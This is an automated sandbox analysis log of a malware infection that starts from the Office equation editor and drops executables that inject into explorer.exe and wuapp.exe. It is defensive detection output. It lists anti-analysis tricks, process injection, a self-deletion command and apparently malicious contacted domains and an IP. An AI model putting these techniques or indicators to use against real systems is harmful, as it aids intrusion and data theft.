          Source: Binary string: C:\krajo\ynpcjm\ntdn\3216792803f64d1292a50b8c7f0c4afc\ibwuyp\qahbtotu\Release\qahbtotu.pdb source: word.exe, 00000004.00000002.945823698.0000000002800000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp, dvukljmnr.exe, 00000005.00000000.914293624.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, wuapp.exe, 00000008.00000002.1182845110.000000000244F000.00000004.10000000.00040000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182267839.00000000002C2000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe.4.dr, nstBFBE.tmp.4.dr
          Source: Binary string: wntdll.pdb source: dvukljmnr.exe, dvukljmnr.exe, 00000006.00000003.923098867.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984351623.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000003.925762664.0000000000740000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, wuapp.exe, 00000008.00000002.1182604769.00000000020D0000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.985104310.00000000009A0000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.983888458.0000000000840000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wuapp.pdb source: dvukljmnr.exe, 00000006.00000002.984008037.0000000000504000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.983799814.0000000000030000.00000040.10000000.00040000.00000000.sdmp
          Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.drInitial sample: OLE indicators vbamacros = False
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_009061EC push FFFFFFF0h; ret 2_2_00906398
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00906330 push FFFFFFF0h; ret 2_2_00906398
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009AF225 push ecx; ret 5_2_009AF238
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041E9E6 push edx; ret 6_2_0041E9EE
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00416B6D push ebx; ret 6_2_00416B85
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041D4F2 push eax; ret 6_2_0041D4F8
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041D4FB push eax; ret 6_2_0041D562
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041D4A5 push eax; ret 6_2_0041D4F8
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041D55C push eax; ret 6_2_0041D562
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041EEB5 push esi; ret 6_2_0041F0D9
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009AF225 push ecx; ret 6_2_009AF238
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F6DFA1 push ecx; ret 8_2_01F6DFB4
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AD4A5 push eax; ret 8_2_000AD4F8
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AD4FB push eax; ret 8_2_000AD562
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AD4F2 push eax; ret 8_2_000AD4F8
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AD55C push eax; ret 8_2_000AD562
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AE9E6 push edx; ret 8_2_000AE9EE
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000A6B6D push ebx; ret 8_2_000A6B85
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AEEB5 push esi; ret 8_2_000AF0D9
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,4_2_00405DDA
          Source: C:\Users\user\AppData\Roaming\word.exeFile created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\word.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exe - User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEB
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE - Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE - Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wuapp.exe RDTSC instruction interceptor: First address: 0000000000099904 second address: 000000000009990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wuapp.exe RDTSC instruction interceptor: First address: 0000000000099B6E second address: 0000000000099B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 848 Thread sleep time: -300000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 3044 Thread sleep time: -46000s >= -30000s
          Source: C:\Windows\SysWOW64\wuapp.exe TID: 2212 Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\SysWOW64\wuapp.exe Last function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_00409AA0 rdtsc 6_2_00409AA0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe API coverage: 7.9 %
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Process information queried: ProcessInformation
          Source: C:\Users\user\AppData\Roaming\word.exe Code function: 4_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,4_2_00405426
          Source: C:\Users\user\AppData\Roaming\word.exe Code function: 4_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,4_2_00405D9C
          Source: C:\Users\user\AppData\Roaming\word.exe Code function: 4_2_004026A1 FindFirstFileA,4_2_004026A1
          Source: C:\Users\user\AppData\Roaming\word.exe API call chain: ExitProcess graph end node graph_4-3361
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe API call chain: ExitProcess graph end node
          Source: explorer.exe, 00000007.00000000.1026135625.00000000043F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000007.00000000.1025894713.000000000434F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0Q
          Source: explorer.exe, 00000007.00000000.1026135625.00000000043F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: word.exe, 00000004.00000002.945543583.0000000000564000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000007.00000000.935522782.000000000037B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
          Source: explorer.exe, 00000007.00000000.1026232834.0000000004423000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.1026135625.00000000043F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
          Source: explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 5_2_009A320D GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,5_2_009A320D
          Source: C:\Users\user\AppData\Roaming\word.exe Code function: 4_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,4_2_00405DDA
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 5_2_009B6AAA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,5_2_009B6AAA
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\wuapp.exe Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 5_2_000F03F8 mov eax, dword ptr fs:[00000030h] 5_2_000F03F8
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 5_2_000F061D mov eax, dword ptr fs:[00000030h] 5_2_000F061D
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 5_2_000F06F7 mov eax, dword ptr fs:[00000030h] 5_2_000F06F7
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 5_2_000F0736 mov eax, dword ptr fs:[00000030h] 5_2_000F0736
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 5_2_000F0772 mov eax, dword ptr fs:[00000030h] 5_2_000F0772
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_00A126F8 mov eax, dword ptr fs:[00000030h] 6_2_00A126F8
          Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F726F8 mov eax, dword ptr fs:[00000030h] 8_2_01F726F8
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\wuapp.exe Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_0040ACE0 LdrLoadDll,6_2_0040ACE0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 5_2_009B1D57 SetUnhandledExceptionFilter,5_2_009B1D57
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 5_2_009B1D88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_009B1D88
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_009B1D88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_009B1D88
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_009B1D57 SetUnhandledExceptionFilter,6_2_009B1D57

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe Domain query: www.paypal-caseid521.com
          Source: C:\Windows\explorer.exe Network Connect: 98.137.244.37 80
          Source: C:\Windows\explorer.exe Domain query: www.storyofsol.com
          Source: C:\Windows\explorer.exe Domain query: www.createacarepack.com
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Section unmapped: C:\Windows\SysWOW64\wuapp.exe base address: B30000
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Section loaded: unknown target: C:\Windows\SysWOW64\wuapp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wuapp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wuapp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Memory written: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Thread register set: target process: 1860
          Source: C:\Windows\SysWOW64\wuapp.exe Thread register set: target process: 1860
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Users\user\AppData\Roaming\word.exe Process created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Process created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
          Source: C:\Windows\SysWOW64\wuapp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe"
          Source: explorer.exe, 00000007.00000000.961310848.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.950104825.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1022850637.0000000000830000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.961310848.0000000000830000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000007.00000000.961310848.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.950104825.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1022850637.0000000000830000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo (repeated),5_2_009A3663
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_009BE8C3
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: GetLocaleInfoW,_GetPrimaryLen,5_2_009BE970
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,5_2_009BE1D4
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,5_2_009B8969
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo (repeated),5_2_009A419C
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,5_2_009BEA44
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,5_2_009B4CB1
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _GetPrimaryLen,EnumSystemLocalesW,5_2_009BE4A4
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: EnumSystemLocalesW,5_2_009BE448
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_009B9D92
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo (repeated),_free,_free,_free,5_2_009A2703
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo (repeated),5_2_009A2B81
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo (repeated),_free,_free,_free,_free,_free,5_2_009B8529
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _GetPrimaryLen,EnumSystemLocalesW,5_2_009BE521
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,5_2_009BE799
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo (repeated),5_2_009B8FA3
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: GetLocaleInfoW,5_2_009B9FDB
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,5_2_009BA75F
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: EnumSystemLocalesW,5_2_009B9F55
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo (repeated),6_2_009A3663
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_009BE8C3
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: GetLocaleInfoW,_GetPrimaryLen,6_2_009BE970
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,6_2_009BE1D4
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: __malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,6_2_009A1118
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,6_2_009B8969
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo (repeated),6_2_009A419C
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,6_2_009BEA44
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,6_2_009B4CB1
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _GetPrimaryLen,EnumSystemLocalesW,6_2_009BE4A4
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: EnumSystemLocalesW,6_2_009BE448
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_009B9D92
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo (repeated),_free,_free,_free,6_2_009A2703
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo (repeated),6_2_009A2B81
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo (repeated),_free,_free,_free,_free,_free,6_2_009B8529
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _GetPrimaryLen,EnumSystemLocalesW,6_2_009BE521
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,6_2_009BE799
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo (repeated),6_2_009B8FA3
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: GetLocaleInfoW,6_2_009B9FDB
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,6_2_009BA75F
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: EnumSystemLocalesW,6_2_009B9F55
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009B00A3 cpuid 5_2_009B00A3
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009B161F GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_009B161F

          Stealing of Sensitive Information

          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
